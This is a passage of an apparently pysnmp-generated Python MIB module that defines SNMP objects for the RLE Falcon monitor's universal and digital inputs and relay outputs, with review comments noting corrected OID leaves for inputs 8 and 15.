falconInput2HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2HighLimit.setStatus('mandatory')
falconInput2LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2LowLimit.setStatus('mandatory')
falconInput2LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2LowLimit2.setStatus('mandatory')
# Relay-control word, alarm delay (seconds, 0-600) and hysteresis.
falconInput2RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2RlyControl.setStatus('mandatory')
falconInput2Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Delay.setStatus('mandatory')
falconInput2Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Hysteresis.setStatus('mandatory')
# Universal inputs 3-7 (...3184.1.1.1.3.<n>) share an identical layout,
# so the five groups are built in a loop rather than repeated verbatim.
# Leaf layout per group: 1 State, 2 Reading (read-only), 3 Gain,
# 4 Offset, 5 Label, 6 UOM, 7 HighLimit2, 8 HighLimit, 9 LowLimit,
# 10 LowLimit2, 11 RlyControl, 12 Delay (0-600 s), 13 Hysteresis (>= 0).
for _inputNo in range(3, 8):
    _base = (1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, _inputNo)
    # Full-range Integer32 syntax, built fresh for each object.
    _int32 = lambda: Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))
    # Group anchor (MibIdentifier has no status).
    globals()['falconInput%d' % _inputNo] = MibIdentifier(_base)
    _group = [
        ('State', MibScalar(_base + (1,), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")),
        ('Reading', MibScalar(_base + (2,), _int32()).setMaxAccess("readonly")),
        ('Gain', MibScalar(_base + (3,), _int32()).setMaxAccess("readwrite")),
        ('Offset', MibScalar(_base + (4,), _int32()).setMaxAccess("readwrite")),
        ('Label', MibScalar(_base + (5,), DisplayString()).setMaxAccess("readwrite")),
        ('UOM', MibScalar(_base + (6,), DisplayString()).setMaxAccess("readwrite")),
        ('HighLimit2', MibScalar(_base + (7,), _int32()).setMaxAccess("readwrite")),
        ('HighLimit', MibScalar(_base + (8,), _int32()).setMaxAccess("readwrite")),
        ('LowLimit', MibScalar(_base + (9,), _int32()).setMaxAccess("readwrite")),
        ('LowLimit2', MibScalar(_base + (10,), _int32()).setMaxAccess("readwrite")),
        ('RlyControl', MibScalar(_base + (11,), _int32()).setMaxAccess("readwrite")),
        ('Delay', MibScalar(_base + (12,), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")),
        ('Hysteresis', MibScalar(_base + (13,), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")),
    ]
    for _suffix, _obj in _group:
        if mibBuilder.loadTexts:
            _obj.setStatus('mandatory')
        globals()['falconInput%d%s' % (_inputNo, _suffix)] = _obj
# --- falconInput8 (...3184.1.1.1.3.8): universal input #8 ---
# BUG FIX: the generated code registered falconInput8RlyControl at OID
# leaf 9 (duplicating falconInput8LowLimit), falconInput8Delay at leaf
# 10 (duplicating falconInput8LowLimit2) and falconInput8Hysteresis at
# leaf 11.  Duplicate OIDs are illegal in SMI and collide in OID-keyed
# registries; every sibling group (inputs 1-7) places these objects at
# leaves 11, 12 and 13, so input 8 now follows the same layout.
falconInput8 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8))
# Input mode selector.
falconInput8State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8State.setStatus('mandatory')
# Current (scaled) reading; read-only.
falconInput8Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput8Reading.setStatus('mandatory')
# Calibration gain/offset.
falconInput8Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Gain.setStatus('mandatory')
falconInput8Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Offset.setStatus('mandatory')
# Free-text label and unit-of-measure strings.
falconInput8Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Label.setStatus('mandatory')
falconInput8UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8UOM.setStatus('mandatory')
# Alarm limit pairs (two high, two low thresholds).
falconInput8HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8HighLimit2.setStatus('mandatory')
falconInput8HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8HighLimit.setStatus('mandatory')
falconInput8LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8LowLimit.setStatus('mandatory')
falconInput8LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8LowLimit2.setStatus('mandatory')
# Relay-control word, alarm delay and hysteresis — was leaves 9/10/11,
# corrected to 11/12/13 to match inputs 1-7 and remove OID collisions.
falconInput8RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8RlyControl.setStatus('mandatory')
falconInput8Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Delay.setStatus('mandatory')
falconInput8Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Hysteresis.setStatus('mandatory')
# Digital-only inputs 9 and 10 live under OID branches ...3184.1.1.1.3.25
# and .26 and share one layout, so both groups are built in a loop.
# Leaf layout: 1 State (digital modes only), 2 Reading (0/1, read-only),
# 3 Label, 4 RlyControl, 5 Delay (0-600 s).
for _inputNo, _branch in ((9, 25), (10, 26)):
    _base = (1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, _branch)
    # Group anchor (MibIdentifier has no status).
    globals()['falconInput%d' % _inputNo] = MibIdentifier(_base)
    _group = [
        ('State', MibScalar(_base + (1,), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")),
        ('Reading', MibScalar(_base + (2,), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")),
        ('Label', MibScalar(_base + (3,), DisplayString()).setMaxAccess("readwrite")),
        ('RlyControl', MibScalar(_base + (4,), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")),
        ('Delay', MibScalar(_base + (5,), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")),
    ]
    for _suffix, _obj in _group:
        if mibBuilder.loadTexts:
            _obj.setStatus('mandatory')
        globals()['falconInput%d%s' % (_inputNo, _suffix)] = _obj
falconInput11 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27))
falconInput11State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11State.setStatus('mandatory')
falconInput11Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput11Reading.setStatus('mandatory')
falconInput11Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11Label.setStatus('mandatory')
falconInput11RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11RlyControl.setStatus('mandatory')
falconInput11Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11Delay.setStatus('mandatory')
falconInput12 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28))
falconInput12State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12State.setStatus('mandatory')
falconInput12Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput12Reading.setStatus('mandatory')
falconInput12Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12Label.setStatus('mandatory')
falconInput12RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12RlyControl.setStatus('mandatory')
falconInput12Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12Delay.setStatus('mandatory')
# falconInput13..falconInput15 (subtrees ...1.1.1.3.29 .. .3.31): same generated
# five-scalar pattern as the other digital inputs (State/Reading/Label/RlyControl/Delay).
falconInput13 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29))
falconInput13State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13State.setStatus('mandatory')
falconInput13Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput13Reading.setStatus('mandatory')
falconInput13Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13Label.setStatus('mandatory')
falconInput13RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13RlyControl.setStatus('mandatory')
falconInput13Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13Delay.setStatus('mandatory')
falconInput14 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30))
falconInput14State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14State.setStatus('mandatory')
falconInput14Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput14Reading.setStatus('mandatory')
falconInput14Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14Label.setStatus('mandatory')
falconInput14RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14RlyControl.setStatus('mandatory')
falconInput14Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14Delay.setStatus('mandatory')
falconInput15 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31))
falconInput15State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15State.setStatus('mandatory')
falconInput15Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput15Reading.setStatus('mandatory')
falconInput15Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15Label.setStatus('mandatory')
falconInput15RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15RlyControl.setStatus('mandatory')
# falconInput15Delay: delay scalar for input 15, 0..600, read-write.
# FIX: the generated OID ended in sub-identifier 50, but every other
# falconInput<N>Delay in this module sits at ...1.1.1.3.<N-base>.5 (e.g.
# falconInput14Delay = ...3.30.5, falconInput16Delay = ...3.32.5). Sub-id 50
# made this object unreachable at the expected ...3.31.5 OID; corrected to 5
# to match the uniform layout (verify against the upstream RLE-FALCON-MIB).
falconInput15Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15Delay.setStatus('mandatory')
# falconInput16..falconInput20 (subtrees ...1.1.1.3.32 .. .3.36): same generated
# five-scalar digital-input pattern (State/Reading/Label/RlyControl/Delay).
falconInput16 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32))
falconInput16State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16State.setStatus('mandatory')
falconInput16Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput16Reading.setStatus('mandatory')
falconInput16Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16Label.setStatus('mandatory')
falconInput16RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16RlyControl.setStatus('mandatory')
falconInput16Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16Delay.setStatus('mandatory')
falconInput17 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33))
falconInput17State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17State.setStatus('mandatory')
falconInput17Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput17Reading.setStatus('mandatory')
falconInput17Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17Label.setStatus('mandatory')
falconInput17RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17RlyControl.setStatus('mandatory')
falconInput17Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17Delay.setStatus('mandatory')
falconInput18 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34))
falconInput18State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18State.setStatus('mandatory')
falconInput18Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput18Reading.setStatus('mandatory')
falconInput18Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18Label.setStatus('mandatory')
falconInput18RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18RlyControl.setStatus('mandatory')
falconInput18Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18Delay.setStatus('mandatory')
falconInput19 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35))
falconInput19State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19State.setStatus('mandatory')
falconInput19Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput19Reading.setStatus('mandatory')
falconInput19Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19Label.setStatus('mandatory')
falconInput19RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19RlyControl.setStatus('mandatory')
falconInput19Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19Delay.setStatus('mandatory')
falconInput20 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36))
falconInput20State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20State.setStatus('mandatory')
falconInput20Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput20Reading.setStatus('mandatory')
falconInput20Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20Label.setStatus('mandatory')
falconInput20RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20RlyControl.setStatus('mandatory')
falconInput20Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20Delay.setStatus('mandatory')
# falconOutputs (...1.1.1.4): six relay outputs, each with four objects:
#   .1 State  - commanded mode (read-write), named values 1..5
#   .2 Status - observed state (read-only), named values 1..6
#   .3 Label  - free-text name
#   .4 Time   - full Integer32 range, read-write (units not visible here; see MIB)
falconOutputs = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4))
falconRelay1 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1))
falconRelay1State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypadcontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1State.setStatus('mandatory')
falconRelay1Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay1Status.setStatus('mandatory')
falconRelay1Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1Label.setStatus('mandatory')
falconRelay1Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1Time.setStatus('mandatory')
falconRelay2 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2))
# NOTE(review): relays 2-6 spell the State(5) named value "keypascontrolled"
# while relay 1 spells it "keypadcontrolled". Looks like a typo inherited from
# the source MIB; named values are part of the contract, so it is left as-is --
# confirm against the upstream RLE-FALCON-MIB before changing.
falconRelay2State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay2State.setStatus('mandatory')
falconRelay2Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay2Status.setStatus('mandatory')
falconRelay2Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay2Label.setStatus('mandatory')
falconRelay2Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
